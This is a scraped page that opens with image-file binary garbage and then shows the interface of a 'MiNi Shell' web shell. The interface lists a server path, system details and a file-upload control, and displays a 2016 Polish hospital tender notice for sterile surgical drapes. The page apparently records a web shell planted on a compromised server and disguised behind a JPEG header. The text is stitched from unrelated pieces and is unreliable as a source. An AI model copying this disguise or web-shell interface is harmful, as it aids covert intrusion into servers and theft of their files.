JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/328262-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.onkologia.krakow.pl' target='_blank'>www.onkologia.krakow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 328262 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kraków: Dostawa jednorazowych, sterylnych obłożeń pola operacyjnego<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Centrum Onkologii Instytut im. Marii Skłodowskiej - Curie Oddział Kraków, krajowy numer identyfikacyjny
              28836600035, ul.
              ul. Garncarska 
              11,
              31115  
              Kraków, woj.
              małopolskie, państwo
              Polska, tel.
              124 231 565, e-mail
              , faks
              012 4231076, 4231565.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: instytut badawczy</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.onkologia.krakow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />ul. Garncarska 11, 31-115 Kraków Dziennik Podawczy</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa jednorazowych, sterylnych obłożeń pola operacyjnego<br /><b>Numer referencyjny: </b>ZP-271-110/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Dostawa jednorazowych, sterylnych obłożeń pola operacyjnego w 3 częściach, zgodnie z opisem dla poszczególnych części ogłoszenia i zał. nr 1a do specyfikacji.<br /><br /><b>II.5) Główny kod CPV: </b>33141000-0<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu i wymagania określone w niniejszej SIWZ.
Wymagania dotyczące przedmiotu zamówienia - art. 25 ust. 1 pkt 2 ustawy pzp
Wymagania Zamawiającego do spełnia przez oferowany przedmiot zamówienia:
Oferowany przedmiot zamówienia jest wyrobem medycznym. 
Wyroby medyczne stanowiące przedmiot zamówienia muszą być dopuszczone do stosowania na terenie Polski zgodnie z postanowieniami ustawy o wyrobach medycznych z dnia  20 maja 2010 r. (tj. Dz. U. z 2015 r., poz. 876) lub na podstawie innych odpowiednich przepisów właściwych dla wyrobu medycznego.



<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">dokument na wezwanie:
Oświadczenie o dopuszczeniu wyrobu medycznego do stosowania w Polsce
Podpisane przez osoby upoważnione do reprezentowania wykonawcy oświadczenie, że zaoferowany przedmiot zamówienia, będący wyrobem medycznym, jest dopuszczony do stosowania na terenie Polski  wg wzoru zał. Nr 4 do specyfikacji.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oferta wg wzoru zał. 1 i 1 do specyfikacji,
Próbki zaoferowanych wyrobów (próbka stanowi treść oferty). Na podstawie próbek dokonana będzie ocena ofert w kryterium: Ocena techniczna (jakość). Zamawiający wymaga złożenia następujących próbek po 2 szt.:
część 1: poz. 5, 10;
część 2: poz. 6;
część 3: poz. 1. 
Z uwagi na to, że próbki są wyrobami jednorazowego użytku Zamawiający nie dokona zwrotu próbek.
W przypadku braku założenia próbki wraz z ofertą Wykonawca otrzyma 0 pkt i nie zostanie wezwany do uzupełnienia próbki w trybie art. 26 ust. 3 ustawy pzp.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>80</td></tr><tr><td>jakość </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zmiany zostały przewidziane we wzorze umowy - zał. nr 3 do specyfikacji.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/11/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Pl<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Jednorazowe, sterylne obłożenia pola operacyjnego - zestawy <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Jednorazowe sterylne obłożenie pola operacyjnego, dwuwarstwowe, spełniające wymagania pełnej barierowości, zgodnie z normą PN EN 13795 . Nieprzepuszczalne dla płynów i  mikroorganizmów. Cechujące się zdolnością absorpcji płynów na całej powierzchni, wysoką odpornością na rozerwanie. Warstwa kleju umożliwiająca łatwe przyklejenie i odklejenie od ciała pacjenta, nie powodujące podrażnień i uczuleń. Bezzapachowe. 
Zestaw uniwersalny w skład którego wchodzi:
- serweta na stolik narzędziowy o wym. 140x190  1 szt.
- serweta na stolik MAYO  składana teleskopowo, folia piaskowana o wym: 80x145  1 szt.
- samoprzylepne serwety operacyjne o wym: 75x90  2szt.
- samoprzylepne serwety operacyjne o wym. 150x175  1 szt.
- samoprzylepne serwety operacyjne o wym:170x175  1 szt.
- taśma samoprzylepna o wym: 10x50  1szt.
- ręczniki celulozowe o  wym. min. 30x30  2szt.
- kompresy gazowe 13N8W 10x10cm - 5 x 10szt.
- chusty gazowe 20N4W z RTG i trokiem 45x45cm - 1 x 5szt.
(wymiary podano w cm.)
Produkt bezpiecznie pakowany do transportu.
W serwetach (150x175 i 170x175) warstwa kleju 2/3 środka serwety, boki bez warstwy klejącej. 
Każdy zestaw powinien posiadać min. 2 naklejki do dokumentacji. 
